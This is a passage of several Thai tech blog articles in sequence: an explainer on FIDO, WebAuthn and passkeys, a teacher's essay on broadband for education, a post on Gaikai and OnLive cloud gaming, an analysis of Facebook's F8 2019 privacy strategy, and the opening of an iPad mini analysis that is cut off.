นั่นคือแม้ว่าคนร้ายจะรู้รหัสผ่านของเหยื่อไม่ว่าช่องทางใดๆ แต่ก็ไม่สามารถล็อกอินสำเร็จ แต่พอเป็นการโจมตีที่แบบที่สอง แม้จะโจมตีได้ยากกว่าแต่ผู้ใช้กลุ่มที่เปิดล็อกอินสองขั้นตอนก็มักเป็นเหยื่อที่มูลค่าสูง เช่น ใช้งานบัญชีคริปโต หรือมีบัญชีเข้าถึงระบบขององค์กรขนาดใหญ่ ช่วงปี 2015 กูเกิลและ Yubico ร่วมกันพัฒนา[โปรโตคอล U2F](https://www.blognone.com/node/75533) เพื่ออาศัยการยืนยันว่าผู้ใช้มีกุญแจ USB อยู่ในมือเป็นการล็อกอินขั้นที่สอง โดยจุดเด่นสำคัญคือเบราว์เซอร์จะส่งข้อมูล URL ของเว็บที่ล็อกอินไปยัง URL ด้วย ทำให้คนร้ายไม่สามารถใช้เว็บฟิชชิ่ง (phishing) เพื่อสร้างเว็บคล้ายกับเว็บจริงแล้วหลอกให้คนเหยื่อใส่รหัสผ่านหรือ OTP ได้อีกต่อไป เพราะกุญแจ U2F จะไม่ตอบหากพบว่ากุญแจไม่ตรงกับที่เคยล็อกอินไว้ก่อนหน้า โดยมาตรฐานนี้ดูแลโดยองค์กรกลางคือ FIDO Alliance กุญแจ FIDO สามารถสร้างด้วยกุญแจ USB, หรือใช้ชิปเข้ารหัสในโทรศัพท์หรือพีซีก็ได้ หลังจากนั้น FIDO ก็ทำงานร่วมกับผู้ผลิตฮาร์ดแวร์จำนวนมาก เปิดทางให้[โน้ตบุ๊กหรือโทรศัพท์สามารถใช้งานแทนกุญแจ USB ได้โดยตรง](https://www.blognone.com/node/96588) ผู้ใช้ไม่ต้องซื้อกุญแจ USB เพิ่มเติมแต่ก็แปลว่าต้องล็อกอินบนอุปกรณ์ที่เคยลงทะเบียนไว้เท่านั้น การใช้งานอาจจะสะดวกขึ้นหลายกรณี เช่น มีกุญแจ USB ที่ลงทะเบียนกับบริษัทไว้แล้ว แต่ลงทะเบียนด้วยโน้ตบุ๊กเป็นกุญแจไว้ด้วย หากวันไหนพกโน้ตบุ๊กไปทำงานก็ไม่จำเป็นต้องพกกุญแจ USB ไป แม้จะลดความยุ่งยากลงเล็กน้อยแต่ก็ยังนับว่าใช้งานยากกับคนจำนวนมากอยู่ดี และ FIDO ส่งมาตรฐานกลางเข้า W3C จนกลายเป็นมาตรฐาน WebAuthn ทุกวันนี้ โดยรองรับทั้งการใช้สำหรับการล็อกอินขั้นที่สอง หรือการล็อกอินโดยไม่ใช้รหัสผ่านอีกเลย Passkey เป็นการแก้ปัญหาความยุ่งยากลง เพราะแต่เดิมนั้นผู้ใช้มีความกังวลเรื่องกุญแจสูญหาย ไม่ได้พกกุญแจเมื่อต้องการใช้งาน หรือความน่ารำคาญสำคัญ คือกุญแจที่ต้องการใช้งานกลับไม่สามารถใช้งานกับเครื่องที่ต้องการล็อกอินได้ เพราะพอร์ตไม่ตรงกัน ตัวกุญแจอาจจะเป็น USB A ขณะที่เครื่องที่ต้องการล็อกอินกลับเป็นพอร์ต USB-C หรือ Lightning การใช้งานกุญแจ FIDO แบบ Bluetooth นั้นยุ่งยากและหลายครั้งอาจจะเชื่อมต่อลำบาก โดย Passkey เน้นการใช้โทรศัพท์ (หรืออาจจะเป็นแอปอื่น) เข้ามาทำหน้าที่แทนกุญแจ USB ใน FIDO/WebAuthn พร้อมกับปรับปรุง WebAuthn สองประการ 1. **เพิ่มการย้ายกุญแจข้ามอุปกรณ์ (key sync)** จากเดิมที่กุญแจยืนยันตัวตนจะผูกกับชิปในอุปกรณ์สักชิ้น ไม่ว่าจะเป็นกุญแจ USB, โน้ตบุ๊ก, หรือโทรศัพท์มือถือ Passkey รองรับการซิงก์กุญแจข้ามอุปกรณ์ไปมา เช่น ผู้ใช้ iPhone สามารถล็อกอินผ่าน Passkey ด้วยโทรศัพท์เครื่องหนึ่ง และเมื่อซื้อ iPhone หรือ iPad มาใหม่ ก็ยังสามารถใช้ล็อกอินบัญชีเดิมได้ต่อไป เช่นเดียวกับผู้ใช้แอนดรอยด์ที่สามารถล็อกอินบัญชีเดิมได้ทุกครั้งที่เปิดใช้โทรศัพท์ด้วยบัญชีกูเกิลบัญชีเดิม 2. **เปิดทางให้ใช้โทรศัพท์ยืนยันตัวตนผู้ใช้บนพีซี** เมื่อผู้ใช้ต้องการยืนยันตัวตนนอกแพลตฟอร์มที่ใช้เก็บกุญแจ Passkey โปรแกรมที่ต้องการการยืนยันตัวตนเช่นเบราว์เซอร์บนพีซี สามารถขอเชื่อมต่อกับอุปกรณ์ที่ใช้เก็บกุญแจ Passkey ได้ เมื่อเราใช้เบราเซอร์เข้าเว็บและล็อกอินบริการที่รองรับ WebAuthn เบราว์เซอร์ที่รองรับ Passkey จะให้เลือกว่าต้องการยืนยันตัวตนด้วยกุญแจ USB หรือใช้โทรศัพท์ หากเราเลือกใช้โทรศัพท์ เบราว์เซอร์จะแสดง QR ขึ้นมา และเมื่อใช้โทรศัพท์สแกน QR แล้ว **โทรศัพท์และเบราว์เซอร์จะส่งข้อมูลผ่าน Bluetooth เพื่อยืนยันว่าอุปกรณ์ทั้งสองอยู่ใกล้ๆ กัน ไม่สามารถสแกน QR จากระยะไกลเพื่อล็อกอินได้** จากนั้นทั้งโทรศัพท์และเบราว์เซอร์จะเชื่อมต่อเข้าหา proxy ผ่านอินเทอร์เน็ตเปิด tunnel เชื่อมต่อถึงกันโดยตรง (ไม่สามารถส่งข้อมูลโดยตรงผ่าน Bluetooth ได้เพราะการเชื่อมต่อ Bluetooth นั้นซับซ้อนและหลายครั้งไม่เสถียร) เมื่อเชื่อมต่อได้แล้ว เบราว์เซอร์จะทำงานเหมือนมีกุญแจ USB อยู่ในเครื่องโดยตรง เบราว์เซอร์จะส่งข้อมูลโดเมนที่กำลังใช้งานอยู่ ส่งข้อมูลยืนยันตัวตนจากเซิร์ฟเวอร์บริการ กลับไปยังโทรศัพท์ และส่งข้อมูลล็อกอินจากโทรศัพท์กลับไปยังเซิร์ฟเวอร์แบบเดียวกับการล็อกอินด้วยกุญแจปกติ ความซับซ้อนทั้งหมดนี้ถูกซ่อนออกจากผู้ใช้ทั่วไป เราแค่มีอุปกรณ์ที่รองรับ Passkey และสามารถล็อกอินได้บนทุกอุปกรณ์ที่ซิงก์กุญแจข้ามไปได้ ผู้ใช้ที่มี iPhone จะล็อกอินได้ทันทีบน iPhone, iPad, หรือ macOS ขณะที่ยังสามารถล็อกอินทุกบริการข้ามแพลตฟอร์มได้ด้วย สำหรับองค์กรที่ไม่ไว้ใจการซิงก์กุญแจข้ามอุปกรณ์เช่นนี้ ยังสามารถเลือกกำหนดกุญแจแบบล็อกเข้ากับอุปกรณ์โดยตรงได้ แต่กับบัญชีโดยทั่วๆ ไปการใช้กุญแจแบบซิงก์ได้ก็ให้ความปลอดภัยที่ดีกว่าการปล่อยให้ผู้ใช้ตั้งรหัสผ่านอย่างมากแล้ว และยังลดความเสี่ยงของการ phishing ลงไปได้ เมื่อซอฟต์แวร์ทั้งหมดรองรับ Passkey จึงน่าจะทำให้ความปลอดภัยรวมของผู้ใช้ดีขึ้นพร้อมกับทำให้ผู้ใช้สามารถใช้งานได้สะดวกขึ้นไปด้วย การที่ผู้ผลิตเบราว์เซอร์รายใหญ่ล้วนให้คำมั่นว่าจะรองรับ Passkey รวมถึงแพลตฟอร์มโทรศัพท์มือถือรายหลักทั้ง iOS และ Android ก็ประกาศรองรับจึงน่าจะทำให้ Passkey กลายเป็นอนาคตของการล็อกอินที่ปลอดภัยยิ่งขึ้น
# ถึงเวลาสร้างถนนแห่งอนาคตให้ประเทศไทยก้าวสู่โลกแห่งการเรียนรู้ได้หรือยัง อาชีพผมเป็นครูสอนหนังสือครับ พักนี้มีโอกาสคุยกับบรรดาสมาชิกประชาคมอาจารย์บ่อยๆ มีคนบ่นว่าไม่ค่อยเข้าใจเด็กรุ่นนี้ ผมพบว่าตัวเองเริ่มเลื่อนเป็นรุ่นคนที่แตกต่างจากเด็กสมัยใหม่ ตัวผมผมเชื่อมั่นในคนรุ่นใหม่ครับ แต่คิดว่าตอนนี้มีช่องว่างระหว่างเรากับนักเรียนมากขึ้น การให้การศึกษาคนได้ดี มาก และเร็วเป็นความเป็นความตายของชาติในยุคนี้ ยุคที่แข่งกันด้วยพลังแห่งนวัตกรรม เป็น **Creative Economy** การถมช่องว่างเหล่านี้จึงเป็นเรื่องสำคัญที่ต้องทำให้ได้ ด้วยโมเดลการเรียนรู้ที่เปลี่ยนไปของคนรุ่นใหม่ การสร้างโครงสร้างพื้นฐานเครือข่ายที่รวดเร็วและทั่วถึง นับเป็นหัวใจสำคัญในการเตรียมเขาเหล่านี้ให้พร้อมจะก้าวสู่อนาคต ตอนผมเด็กๆ เราเรียนโดยการ อ่านตำรา ฟังครูสอน แล้วมาหัดทำ หนังสือหนังหาดีๆ หายากและแพงมาก ตอนนี้ อินเทอร์เน็ตเข้ามาเปลี่ยนทุกอย่าง ทำให้เด็กสมัยนี้เข้าถึงและสร้างความรู้ได้ง่ายและรวดเร็ว ผมคิดเล่นๆ ว่าการศึกษาสำหรับ Creative Economy สามารถใช้สูตรของไอน์สไตน์อธิบายได้แล้วครับ > E = MC^2 > > > E= Education เกิดจาก > > M = Motivation ทำอย่างไรให้คนอยากเรียนอยากรู้ ขุดค้นลงไปเอง > > C = Collaboration การศึกษาอย่างลึกซึ้งเป็นเรื่องของการประสานงานเป็นทีมร่วมมือกันและเปลี่ยนความรู้กัน > > C = Communication การศึกษาเป็นผลของการสื่อสารกันอย่างรวดเร็ว การที่สามารถเก็บ สืบค้น ประมวลผลและกระจายความรอบรู้ได้เร็วมากๆ > คนรุ่นใหม่ตอนนี้เรียนเล่นทำงานแบบรวมกลุ่มใช้เวบและการส่งข้อความผ่านระบบ SMS, MSN และ Twitter ประสานงานกันตลอดเวลาครับ ทุกคนโตมากับสภาพแวดล้อมแบบ Interactive เช่น online games ดังนั้นบรรดาคุณครูทั้งหลายต้องเข้าใจตรงนี้ จับเด็กมาฟังเราสอนไปเรื่อยเขาจะหลับหมด และไม่มีสมาธิ เพราะเขาชินกับสภาพแวดล้อมที่เป็นไดนามิคมากกว่านี้ ดังนั้นครูและสถาบันการศึกษาตลอดจนถึงรัฐบาลน่าจะถามตัวเองด้วยคำถามเหล่านี้ ครับ - เราให้แรงจูงใจเด็กพอหรือไม่ว่าวิชานั้นนี้เอาไปทำอะไร ทำให้จับต้องได้ ขุดเองได้และน่าสนใจอย่างไร เขาจะได้ทำให้ตัวเองเก่งโดยการเรียนด้วยตนเองชั่วชีวิตได้ - ได้มีการหนุนให้มีการทำงานเป็นทีมแบบร่วมมือกันมากพอไหม - มีโครงสร้างพื้นฐานด้านไอทีเช่น เครือข่ายคอมพิวเตอร์ ระบบคอมพิวเตอร์ มีเว็บ, เครือข่ายไร้สาย, ซอฟต์แวร์บริหารจัดการสื่อและข้อมูล ต่างๆ ที่ดีพอหรือไม่ - ได้มีโครงสร้างให้เกิดการสื่อสารที่เร็วและเสถียรแค่ไหนเพื่อให้การติดต่อสื่อสารระหว่างบุคคลทำได้เร็วและดี รัฐบาลคงต้องเพิ่มสัดส่วนการลงทุนในโครงสร้างพื้นฐานอินเทอร์เน็ตสำหรับการศึกษาให้มากขึ้นเพื่อสร้างให้ระบบการศึกษามีความพร้อมสำหรับอนาคตที่กำลังมาถึง ประเทศไทยควรมีอินเทอร์เน็ตความเร็วสูงมากๆ อย่างทั่วถึงกว่านี้ การสร้างถนนหนทางเป็นของดีสำหรับเศรษฐกิจการผลิตแบบอุตสาหกรรม อินเทอร์เน็ตต่างหากที่เป็นหัวใจของการสร้าง เศรษฐกิจแห่งความรอบรู้ สังคมแห่งปัญญาและการแบ่งปัน เพื่อให้ประเทศไทยก้าวสู่อนาคตอย่างมั่นคง ผมเคยเห็นสะพานลอยข้ามแยกที่ถนนหนึ่งในกรุงเทพ โครงการ 200 ล้านบาทครับ เอามาทำเครือข่ายบรอดแบนด์ให้คนไทยเข้าถึงขุมปัญญาที่กระจายทั่วโลกแบบรวดเร็วได้บ้างไหม คนไทยจะได้ฉลาดๆ ขึ้น ผมว่าเราต้องพยายามช่วยกันสื่อให้ถึงนักการเมืองและผู้บริหารประเทศว่าโลกเปลี่ยนแล้ว การสร้างรากฐานของ Creative economy ซึ่งแข่งกันที่การสร้างนวัตกรรมนั้น การสร้าง Cyber infrastructure ที่แข็งแกร่งที่ทำให้คนไทยสร้าง เข้าถึงและแบ่งปันองค์ความรู้ได้อย่างรวดเร็วนั้น เริ่มสำคัญกว่าการสร้างถนนหนทางและน่าจะทำคู่กันไปในการพัฒนาประเทศ แถมการลงทุนก็ต่ำกว่าการสร้างถนนมาก หวังว่าวันที่เด็กไทยทุกคนจะอยู่บนเครือข่ายความเร็วสูง และมีปัญญาเฟื่องฟูได้โดยเร็วจะมาถึงสักวันครับ
# สงครามบริการ Cloud Gaming กำลังจะเกิดขึ้น มาแรงจริง ๆ ครับ สำหรับเทคโนโลยี Cloud Computing วงการเกมส์ก็ได้นำเอาเทคโนยีนี้มาใช้กับเค้าเหมือนกัน ผมเลยรวบรวมจับมาเขียนกันสด ๆ เลย โดยเริ่มต้นจาก 2 ผู้บุกเบิกในสงครามนี้ คือ Gaikai กับ Onlive ที่ได้พัฒนาระบบออกมาเสร็จเป็นรูปเป็นร่างแล้ว ผมขอสรุปให้ทุกท่านทราบก่อนครับว่า Cloud Gaming เป็นอย่างไร Cloud Gaming คือการให้บริการเกมส์และเนื้อหาเกมส์ทุกรูปแบบโดยใช้เทคโนโลยี Cloud Computing โดยตัวระบบเน้นการประมวลผลในเรื่องกราฟิกแทนเครื่องผู้ใช้งานเป็นหลัก ส่วนข้อมูลเชิงเทคนิคยังไม่ถูกเปิดเผย บริการ Cloud Gaming ที่กำลังจะเปิดตัว ได้แก่ 1. บริการ Games On-demand ที่ให้เราเลือกเล่นเกมส์ใด ๆ ไม่ว่าจะเล่นคนเดียวหรือหลาย ๆ คนพร้อมกัน 2. บริการ Demo Games ก่อนซื้อ ที่จะทดลองเล่นคนเดียวหรือหลายคนก็ได้ด้วย 3. บริการชมการเล่นเกมส์ของผู้เล่นคนอื่น ๆ กันแบบสด ๆ เราสามารถดูใคร ๆ เล่นเกมส์ได้ 4. เราสามารถบันทึกและเผยแพร่รูปแบบการเล่นเกมส์ของเราได้ด้วย 5. บริการเนื้อหาเกมส์ใหม่ ๆ เช่น Trailers จุดเด่นของ Cloud Gaming ได้แก่ 1. บริการทั้งหมดข้างต้น ใช้เวลาสตรีมมิ่งประมาณหนึ่งนาทีหรือน้อยกว่า ก็เริ่มเกมส์ได้แล้ว (เค้าโฆษณาว่าแบบนี้) 2. ใช้เพียง Web Browser เป็นส่วนติดต่อกับผู้ใช้งาน แต่จะต้องติดตั้ง Plug-in ก่อน เท่าที่ทราบจะใช้อย่างใดอย่างหนึ่งระหว่าง Flash, Java หรือ Silverlight 3. ไม่ต้องดาวน์โหลดและติดตั้งเกมส์ก่อนเล่นแต่อย่างใด นับว่าเป็นจุดเด่นของเทคโนโลยี Cloud Computing 4. ไม่ต้องการ Hardware ระดับสูง โดยเฉพาะ Graphic Card แต่ต้องการ Broadband Internet 5. สามารถเชื่อมต่อกับจอ TV ได้ แต่จะต้องใช้ Adapter พิเศษช่วยควบคุม 6. คุณภาพของบริการเป็นแบบ Full resolution พร้อมระบบเสียง Stereo และ กระตุกน้อยมาก 7. สนับสนุนทั้งบน Windows, Linux และ Mac ข่าวดีสำหรับใครที่มี iPad ก็สามารถใช้บริการนี้ได้เช่นกัน โดยหนึ่งในผู้ก่อตั้งค่าย Gaikai ได้สาธิตการเล่น World of Warcraft บน iPad ผ่าน Streaming Worlds ของ Gaikai แต่ยังทำเฟรมเรตได้ไม่ดีเท่าไรนัก ค่าบริการคิดเป็นรายเดือนประมาณ $14.95 แรกเริ่มยังคงจำกัดการให้บริการในเฉพาะสหรัฐฯ ทั้งสองค่ายจะเปิดตัวอย่างเป็นทางการในงาน E3 นี้ ส่วนรายละเอียดเป็นอย่างไรจะกลับมารายงานให้ทราบต่อครับ ข้อมูล: [Onlive](http://www.onlive.com/index.html), [Gaikai](http://www.gaikai.com/)
# [วิเคราะห์] ทำไม Facebook ต้องกลับลำ 180 องศา เน้นคุยกลุ่มเล็ก-ส่วนตัว เลิกบ้าปั่นไลค์ ประกาศสำคัญของ Facebook ในงาน F8 2019 นอกจาก[การปรับดีไซน์ครั้งใหญ่ เลิกใช้สีน้ำเงิน หันมาใช้สีขาวล้วน](https://www.blognone.com/node/109514) ยังมี[การประกาศยุทธศาสตร์ใหม่ของบริษัทที่เน้นความเป็นส่วนตัว](https://www.blognone.com/node/109486) ถึงขนาด Mark Zuckerberg ประกาศคำว่า "The Future is Private" ขึ้นบนจอภาพ เรามาดูกันว่าเพราะเหตุใด Facebook ที่มีชื่อเสียงย่ำแย่มาตลอดในเรื่องความเป็นส่วนตัว จึงกลับลำ 180 องศา หันมาเชิดชูความเป็นส่วนตัวขนาดนี้ และในทางปฏิบัติแล้ว Facebook จะทำอย่างไรบ้าง ### ลานกลางเมือง vs ห้องนั่งเล่น Mark Zuckerberg เริ่มต้นงาน F8 2019 ว่าเขาต้องการสร้าง "privacy-focus social platform" โดยเขา เปรียบเทียบเรื่องพื้นที่ (space) ว่าโลกเรามีพื้นที่สาธารณะ (public space) เช่น ลานกลางเมืองที่ใครๆ ก็มาใช้งานได้ และพื้นที่ส่วนตัว (private space) อย่างห้องนั่งเล่นในบ้านของแต่ละคน ซึ่งในโลกดิจิทัล เราก็ต้องการพื้นที่ทั้งสองแบบเพื่อใช้งานในบริบทที่ต่างกัน เขาบอกว่าตลอด 15 ปีที่ผ่านมาของบริษัท Facebook เน้นการสร้างลานกลางเมืองที่ให้คนจำนวนมากๆ มาพบเจอกัน แต่เมื่อโลกเปลี่ยนไป การอยู่ในโลกโซเชียลที่มีคนจำนวนมากๆ อาจทำให้เราสูญเสียตัวตนในโลกส่วนตัวไป เช่น ไม่กล้าพูดหรือแชร์ในสิ่งที่เราทำเฉพาะในกลุ่มเพื่อนหรือคนรู้จักกลุ่มเล็กๆ ผลคือคนหันไปใช้วิธีการสื่อสารผ่านแชท, Stories, หรือการพูดคุยในกลุ่มขนาดเล็กมากขึ้น นี่จึงเป็นภารกิจใหม่ของเขาในการสร้าง Digital Living Room เพื่อให้คนสื่อสารกันอย่างสะดวกใจมากขึ้น เขาบอกว่าในระยะยาวแล้ว โซเชียลแบบปิดจะสำคัญกว่าโซเชียลแบบเปิดด้วยซ้ำ ### หลักการ 6 ข้อเพื่อความเป็นส่วนตัว Zuckerberg ได้ประกาศหลักการ 6 ข้อสำหรับโซเชียลแห่งอนาคตที่เน้นความเป็นส่วนตัว ได้แก่ - **Private Interactions** การสื่อสารกันในกลุ่มปิด - **Encryption** การเข้ารหัสเพื่อไม่ให้ใครก็ตาม (แม้แต่ Facebook เอง) เข้าถึงเนื้อหาที่คุยกันได้ - **Reduced Permanence** ลดความ "ถาวร" ของข้อความลง เนื้อหาที่เราโพสต์ในวันนี้ อาจไม่ใช่สิ่งที่เราคิดในอีก 5 ปีข้างหน้า และไม่ควรรู้สึกอับอายกับมันในอนาคต - **Safety** ความปลอดภัยของผู้ใช้งาน - **Interoperability** การทำงานร่วมกันของแต่ละแพลตฟอร์มในเครือของ Facebook เอง - **Secure Data Storage** การเก็บรักษาข้อมูลของผู้ใช้ให้ปลอดภัยจากหน่วยงานภาครัฐ [ตามข่าวนี้](https://www.blognone.com/node/109432) ในอนาคตจากนี้ไป ผลิตภัณฑ์ต่างๆ ของ Facebook จะพัฒนาขึ้นบนหลักการทั้ง 6 ข้อนี้ บริษัทยังจะเปิดกว้างและปรึกษาภาคส่วนต่างๆ ในสังคม ไม่ว่าจะเป็นหน่วยงานภาครัฐ นักวิชาการ ผู้เชี่ยวชาญ ฯลฯ ให้มากขึ้นด้วย ### Messaging, Stories, Groups คือหัวใจสำคัญของ Facebook ยุคใหม่ แกนกลางสำคัญของ Facebook แบบเดิมคือ News Feed (ทั้งบน Facebook และ Instagram) ที่ให้ผู้ใช้โพสต์เนื้อหาแล้วให้เพื่อนๆ ทั้งหมดเข้ามามองเห็นได้ (หรือโพสต์เป็น public ที่เปิดให้ใครก็ได้เข้ามาดูได้) ส่วนแกนกลางของ Facebook ยุคใหม่คือบริการที่เน้นคุยในกลุ่มเล็กลงจากเดิม ซึ่งแยกได้เป็น 3 ประเภทคือ Messaging, Stories, Groups แต่ละอย่างก็มีความแตกต่างกันไปในรายละเอียด ### Messaging Facebook มีแอพแชทอยู่ 2 ตัวคือ Messenger และ WhatsApp โดยไอเดียของ Zuckerberg บอกว่า[ต้องการให้ระบบแชทพื้นฐานทำงานได้ดี เร็ว ปลอดภัย](https://www.blognone.com/node/109487) จากนั้นค่อยเพิ่มวิธีการสื่อสารแบบใหม่ๆ ให้คนสื่อสารกันผ่านระบบแชทวงปิดเหล่านี้ เช่น ฟีเจอร์ใหม่ของ Messenger ที่เปิดให้คนมาดูวิดีโอร่วมกัน (เหมือน Facebook Watch แต่เฉพาะเพื่อน) หรือฟีเจอร์แชร์พิกัด-ส่งเงินให้กันบน WhatsApp ### Stories ฟีเจอร์ Stories มีจุดเด่นที่โพสต์แล้วเนื้อหาจะหายไปในช่วงเวลาที่กำหนด ซึ่งได้รับความนิยมสูงทั้งบน Facebook และ Instagram ซึ่งเป็นการสื่อสารแบบเปิด สิ่งที่ Facebook กำลังทำคือเชื่อมโยงมันเข้ากับระบบสื่อสารแบบปิดคือ Messenger และ WhatsApp ซึ่งจะแสดง Stories เหมือนกัน ([บน WhatsApp ใช้ชื่อว่า Status](https://www.blognone.com/node/90248)) แต่แสดงเฉพาะจากเพื่อนสนิทของเราเท่านั้น เป็นการสื่อสารอีกแบบหนึ่งนอกเหนือไปจากการแชทคุยกันตรงๆ แต่ช่วยให้เราติดตามได้ว่าเพื่อนของเรากำลังทำอะไรอยู่ ไม่ใช่ติดตามว่าดาราหรือคนดังกำลังทำอะไรอยู่แบบ Instagram ### Groups ในขณะที่การแชทเป็นการสื่อสารกันระหว่างครอบครัวหรือเพื่อนสนิท (friends) ยังมีการสื่อสารที่ใหญ่ขึ้นอีกระดับคือ Groups ซึ่งเป็นชุมชนขนาดเล็ก (communities) ของคนที่มีความสนใจร่วมกัน แต่ยังไปไม่ถึงระดับของ public แบบ Facebook ของเดิม แนวทางของ Facebook จึงเป็นการออกแบบ UI ใหม่หมด และ[ยกระดับความสำคัญของ Groups ให้มากขึ้นกว่าเดิมมาก](https://www.blognone.com/node/109514) เพื่อจูงใจให้คนมาใช้งาน Groups มากขึ้นนั่นเอง Facebook ยังประกาศฟีเจอร์ใหม่ให้ Groups มากมาย ตอบโจทย์การใช้งานของกลุ่มประเภทต่างๆ เช่น กลุ่มคนเล่นเกมเดียวกัน จะได้ฟีเจอร์ห้องแชทย่อยภายในกลุ่มที่คุยเฉพาะประเด็นที่ตัวเองสนใจ (ตัวอย่างคือเทคนิคการเล่นของตัวละครตัวเดียว ไม่ต้องแชทคุยกับคนเล่นตัวละครอื่น แต่ยังอยู่ในกลุ่มเดียวกัน), กลุ่มซื้อขายของจะเพิ่มฟีเจอร์กดจ่ายเงินได้ในตัว หรือฟีเจอร์ประกาศหางานในกลุ่มคนหางาน เป็นต้น Mark Zuckerberg ประกาศในงานว่าตอนนี้มีผู้ใช้ฟีเจอร์ Groups จำนวนอย่างน้อย 400 ล้านคนแล้ว ถึงแม้จะยังไม่เยอะมากเมื่อเทียบกับผู้ใช้งาน Facebook ทั้งหมด 2 พันล้านคน แต่การดัน Groups แบบสุดตัวก็น่าจะช่วยเพิ่มจำนวนผู้ใช้ได้อีกมาก ### แล้วอนาคตของ News Feed จะเป็นเช่นไร? ทิศทางของ Facebook ในปี 2019 ที่ประกาศออกมา แสดงให้เห็นชัดว่าบริษัทต้องการกำจัดจุดอ่อน (ที่เคยเป็นจุดแข็งมาตลอด) นั่นคือโมเดลของ News Feed หรืออย่างน้อยก็ลดความสำคัญลง ที่ผ่านมา โมเดลธุรกิจของ Facebook ยืนอยู่บนแนวคิดที่เน้นปริมาณ ไม่ว่าจะเป็นส่งเสริมให้เรามีเพื่อนเยอะๆ โพสต์เยอะๆ กดไลค์เยอะๆ มีแฟนเพจเยอะๆ เพราะยิ่งคนโพสต์เยอะ อ่านเยอะ ยิ่งอยู่บน Facebook นาน ยิ่งมีโอกาสทำเงินจากโฆษณาเยอะตามไปด้วย แนวคิดที่เน้นปริมาณอาจใช้การได้ในยุคเริ่มต้นของโซเชียล แต่เมื่อเวลาผ่านไป เราก็เห็นผลกระทบด้านลบตามมามากมาย ไม่ว่าจะเป็นปัญหาความเป็นส่วนตัว ความรุนแรง ความเกลียดชัง ข่าวปลอม และเนื้อหาไม่เหมาะสมต่างๆ ที่อาศัยอัลกอริทึมของ Facebook ที่อิงกับความนิยม จำนวน และ engagement จนสร้างปัญหาให้ Facebook อย่างหนักในรอบ 2-3 ปีที่ผ่านมา ถึงแม้ Facebook ไม่ได้ประกาศอะไรเกี่ยวกับ News Feed หรือโมเดลการโพสต์แบบเดิม แต่เราก็น่าจะพอคาดเดาได้ว่า Facebook กำลังจะหาโมเดลอื่นมาทดแทน เพื่อการันตีว่าผู้ใช้เหล่านี้จะยังอยู่บนแพลตฟอร์มของ Facebook ต่อไปในอนาคต อย่างน้อยไม่ชอบการโพสต์บนหน้าโพรไฟล์ของตัวเอง ก็ขอให้ใช้ฟีเจอร์แชทหรือสนทนาในกลุ่มปิดก็ยังดี แถมสร้างปัญหาน้อยกว่าด้วย ### ปัญหาความเชื่อมั่น ตกลงแล้ว Facebook เคารพความเป็นส่วนตัวจริงหรือ? Mark Zuckerberg ยอมรับเองบนเวทีว่า Facebook มีชื่อเสียงที่ไม่ดีนักในเรื่องความเป็นส่วนตัว แต่เขายืนยันจะทำสิ่งนี้ให้ดี นี่จะถือเป็นจุดเปลี่ยนสำคัญของบริษัท Facebook และมันต้องใช้เวลาอีกพอสมควรถึงจะเห็นความเปลี่ยนแปลง และถึงแม้ว่า Zuckerberg ประกาศแนวทางใหม่ของ Facebook บนเวทีงาน F8 แต่ฟีเจอร์ของบริการต่างๆ ก็ยังไม่มีฟีเจอร์ไหนที่เน้นความเป็นส่วนตัวให้เห็นกันสักเท่าไร ในขณะที่ [ฟีเจอร์ Clear History ที่สัญญาไว้ตั้งแต่ปี 2018 ก็ไม่ถูกพูดถึงไปอย่างเนียนๆ](https://www.blognone.com/node/109494) ทำเป็นเหมือนลืมกันไปแล้ว และในทางกลับกัน ฟีเจอร์ใหม่ของปีนี้ Secret Crush บอกว่าเราแอบชอบใครอยู่ ก็ยิ่งทำให้ Facebook ถูกวิจารณ์ว่าตั้งใจล้วงข้อมูลส่วนตัวของเราไปมากกว่าเดิมซะอีก ประกาศของ Mark Zuckerberg ที่ว่า The Future of Private จึงต้องใช้เวลาในการพิสูจน์ตัวเอง ว่าตกลงแล้วมันคือจุดเปลี่ยนของ Facebook เข้าสู่ยุคใหม่จริงๆ หรือเป็นเพียงคำพูดสวยหรูของผู้นำองค์กร เพื่อลดกระแสวิพากษ์วิจารณ์ลง โดยที่ DNA ขององค์กรยังเน้นปริมาณ เน้นจำนวนเยอะๆ และไม่เคารพความเป็นส่วนตัวของผู้ใช้งานดังเช่นที่เป็นมา
# บทวิเคราะห์สินค้าตระกูล iPad – เมื่อแอปเปิลขยายตลาด ในคืนนี้หลังจากแอปเปิลเปิดตัวสินค้าชิ้นใหม่อย่าง iPad 4 และ iPad Mini ก็มีเสียงวิพากษ์วิจารณ์เกี่ยวกับผลิตภัณฑ์ในหลายๆ แง่ ดังนั้นผมเลยขอนำมาเขียนเป็นบทความวิเคราะห์ให้อ่านกันครับ ขอชี้แจงให้ทราบว่าบทความนี้เขียนจากมุมมอง ข้อคิดเห็น และความคิดส่วนตัวเท่านั้นครับ ### iPad mini – เพราะจอ 10" มันใหญ่เกินไป ท่ามกลางกระแสความนิยมของแท็บเล็ตขนาดจอ 7" ที่ได้รับความนิยมด้วยเหตุผลของความสะดวกในการพกพา ผมคาดว่าแอปเปิลน่าจะเล็งเห็นความสำคัญของตลาดลูกค้าที่ต้องการแท็บเล็ตขนาดพอดีมือที่สามารถทำงานทั่วไป แต่ในขณะเดียวกันสตีฟ จ็อบส์ก็เชื่อมาโดยตลอดว่าแท็บเล็ตขนาด 7" มีขนาดเล็กไป และมนุษย์จำเป็นต้องมีนิ้วมือที่เล็กลงเพื่อที่จะสามารถสั่งงานบนหน้าจอขนาดนั้นได้ สิ่งที่ออกมาคือ iPad mini ที่มาพร้อมขนาดหน้าจอ 7.9" ซึ่งวิศวกรของแอปเปิลบอกว่ามีพื้นที่มากกว่าจอ 7" อยู่ 35% แต่ยังคงความละเอียดของหน้าจอไว้ที่ 1024x768 หรือเท่ากับ iPad 2 ซึ่งหากมองในมุมมองของนักพัฒนาแล้ว นักพัฒนาสามารถนำแอปที่มีอยู่แต่เดิมมาใช้บน iPad Mini ได้ทันที ซึ่งเอาเข้าจริงแล้วผมเชื่อว่าขนาดเส้นทแยงมุมหน้าจอที่เล็กลงไปเหลือประมาณ 80% น่าจะทำให้แอปเก่าๆ มีปัญหา และผู้ผลิตก็จำเป็นที่จะต้องอัพเดตแอปกันอยู่ดีครับ สำหรับนักพัฒนาแอปที่ต้องการทดสอบความสะดวกในการใช้งานแอปบน iPad mini สามารถทำได้โดยเปิดภาพหน้าจอความละเอียด 1024x768 บนโน้ตบุ๊กทั่วไป แล้วตั้งกำลังขยายภาพไว้ที่ 81.44% จะได้ขนาดแอปคร่าวๆ 